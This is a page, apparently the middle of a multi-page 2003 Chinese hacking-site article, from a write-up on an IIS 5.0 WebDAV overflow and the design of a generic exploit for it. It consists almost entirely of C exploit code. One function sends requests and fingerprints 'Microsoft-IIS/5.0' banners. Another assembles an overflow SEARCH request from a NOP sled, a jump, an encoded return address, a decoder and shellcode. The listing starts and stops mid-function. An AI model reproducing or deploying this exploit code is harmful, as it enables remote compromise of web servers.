| WebDav漏洞简单分析及通用exploit设计 | |||||
作者:eyas 文章来源:CnXHacker.Net 更新时间:2003-5-18 |
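break; case ERROR_RECV_TIMEOUT: printf("recv buff timeout.Maybe success?\n"); exit(1); break; default: exit(1); } } printf("Done.\n"); }
/* (the statements above are the tail of the preceding function, continued
 * from the previous page of the listing; they are left as found) */

/*
 * SendBuffer - connect to ip:iPort over TCP, send len bytes of buff, read a
 * single reply chunk and classify it by the server banner / status line.
 *
 * Returns one of the ERROR_* codes defined elsewhere in this file:
 *   ERROR_CONNECT_FALIED     connect() failed; g_iConnectError is incremented
 *   ERROR_RECV_TIMEOUT       no reply arrived within RecvTimeOut
 *   ERROR_CONNECT_RESET      the peer reset the connection (WSAECONNRESET)
 *   ERROR_NOT_IIS            reply does not contain "Microsoft-IIS/5.0"
 *   ERROR_RESOURCE_NOTFOUND  reply contains "404 Resource Not Found"
 *   ERROR_BAD_REQUEST        reply contains "400 Bad Request"
 *   ERROR_METHOD_NOT_SUPORT  reply contains "501 Not Supported"
 *   ERROR_OTHER              any other failure, and also an IIS 5.0 reply
 *                            that matched none of the status strings above
 *                            (unchanged from the original behaviour)
 *
 * Side effects: g_iConnectError is reset to 0 once connect() succeeds.
 *
 * Fixes relative to the original: the socket handle is initialised before
 * the cleanup path tests it (it was read uninitialised when WSAStartup
 * failed), recv() leaves room for the NUL that the strstr() checks rely on
 * (a full 0x1000-byte reply previously made strstr() read past the buffer),
 * the Winsock error code is read once instead of twice, send() is looped
 * for short writes, and WSACleanup() is only called after a successful
 * WSAStartup().
 */
int SendBuffer(char *ip, int iPort, unsigned char *buff, int len)
{
    struct sockaddr_in sa;
    WSADATA wsd;
    SOCKET s = INVALID_SOCKET;   /* so the cleanup test is valid on every path */
    int wsaStarted = 0;
    int iRet = ERROR_OTHER;
    int iErr, wsaErr;
    int i;
    int sent;
    char szRecvBuff[0x1000];

    memset(szRecvBuff, 0, sizeof(szRecvBuff));
    memset(&sa, 0, sizeof(sa));

    if (WSAStartup(MAKEWORD(1, 1), &wsd) != 0) {
        printf("WSAStartup error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    wsaStarted = 1;

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        printf("\nCreate socket failed:%d", GetLastError());
        goto cleanup;
    }

    /* Bound the wait for the reply. Winsock takes the option value through a
     * byte pointer. A failure here is not fatal: recv() may just block longer. */
    i = RecvTimeOut;
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (const char *)&i, sizeof(i));

    sa.sin_family = AF_INET;
    sa.sin_port = htons(iPort);
    /* NOTE(review): inet_addr() yields INADDR_NONE for a malformed address;
     * that is not distinguished here and surfaces as a connect failure. */
    sa.sin_addr.S_un.S_addr = inet_addr(ip);

    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == SOCKET_ERROR) {
        iRet = ERROR_CONNECT_FALIED;
        g_iConnectError++;
        goto cleanup;
    }
    g_iConnectError = 0;   /* consecutive-failure counter resets on success */

    /* send() may accept fewer bytes than asked for; keep going until the whole
     * request is out. A zero return cannot make progress, so treat it as an
     * error rather than spinning. */
    for (sent = 0; sent < len; sent += iErr) {
        iErr = send(s, (const char *)buff + sent, len - sent, 0);
        if (iErr == SOCKET_ERROR || iErr <= 0) {
            printf("send buffer error:%d.\n", WSAGetLastError());
            goto cleanup;
        }
    }

    /* Read one chunk, reserving the last byte so the buffer is always a
     * NUL-terminated string for the strstr() checks below. */
    iErr = recv(s, szRecvBuff, sizeof(szRecvBuff) - 1, 0);
    if (iErr == SOCKET_ERROR) {
        wsaErr = WSAGetLastError();   /* read once; later calls may clobber it */
        if (wsaErr == WSAETIMEDOUT)
            iRet = ERROR_RECV_TIMEOUT;
        else if (wsaErr == WSAECONNRESET)   /* 10054 in the original */
            iRet = ERROR_CONNECT_RESET;
        goto cleanup;
    }
    szRecvBuff[iErr] = '\0';

    /* A reply without the IIS 5.0 banner - including an empty one when the
     * peer closed without sending anything - is reported as not-IIS. */
    if (strstr(szRecvBuff, "Microsoft-IIS/5.0") == NULL) {
        iRet = ERROR_NOT_IIS;
        printf("Target not iis.\n");
        goto cleanup;
    }
    if (strstr(szRecvBuff, "404 Resource Not Found") != NULL) {
        iRet = ERROR_RESOURCE_NOTFOUND;
        goto cleanup;
    }
    if (strstr(szRecvBuff, "400 Bad Request") != NULL) {
        iRet = ERROR_BAD_REQUEST;
        goto cleanup;
    }
    if (strstr(szRecvBuff, "501 Not Supported") != NULL) {
        iRet = ERROR_METHOD_NOT_SUPORT;
        printf("501 Not Supported\n");
        goto cleanup;
    }
    /* Any other IIS 5.0 reply leaves iRet at ERROR_OTHER, as before. */

cleanup:
    if (s != INVALID_SOCKET)
        closesocket(s);
    if (wsaStarted)
        WSACleanup();
    return iRet;
}

/* offset is the length of the IIS path; the body of MakeExploit continues
 * on the next page of the listing */
int MakeExploit(unsigned int retaddr, int offset, char *host, char *ip, int iPort)
{
    unsigned char jmpaddr[16];
    unsigned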
char *pStr, szNOP[4]; int i, iNop, iRet; szNOP[0]=NOPCODE; szNOP[1]='\0'; //转换字符格式 sprintf(jmpaddr,"%%u%.2X%.2X%%u%.2X%.2X", retaddr>>8&0xFF, retaddr&0xFF, retaddr>>24&0xFF, retaddr>>16&0xFF); //分配内存 pStr = (unsigned char *)malloc(40000); //组合buffer strcpy(pStr, "SEARCH /"); //填充NOP CODE IISPATH+NOP = 0x260/2 for(i=offset;i<OVERPOINT/2;i++) strcat(pStr, szNOP); //jmp to decoder strcat(pStr, jmpover); //jmp addr strcat(pStr, jmpaddr); //decode real shellcode strcat(pStr, decoder); //real shellcode strcat(pStr, xShellCode); //计算后面还需填充多少个NOP CODE iNop = (BUFFLEN-OVERPOINT-8-strlen(decoder)/3-strlen(xShellCode)*2)/2; //填充NOP CODE for(i=0;i<iNop;i++) strcat(pStr, szNOP); strcat(pStr, " HTTP/1.0\n" "Content-Type: text/xml\n" "Content-length:8\n\n" "OOOOOOOO\n\n"); //发送我们精心构造的buff iRet = SendBuffer(ip, iPort, pStr, strlen(pStr)); //释放内存 free(pStr 上一页 [1] [2] [3] [4] [5] [6] [7] 下一页 |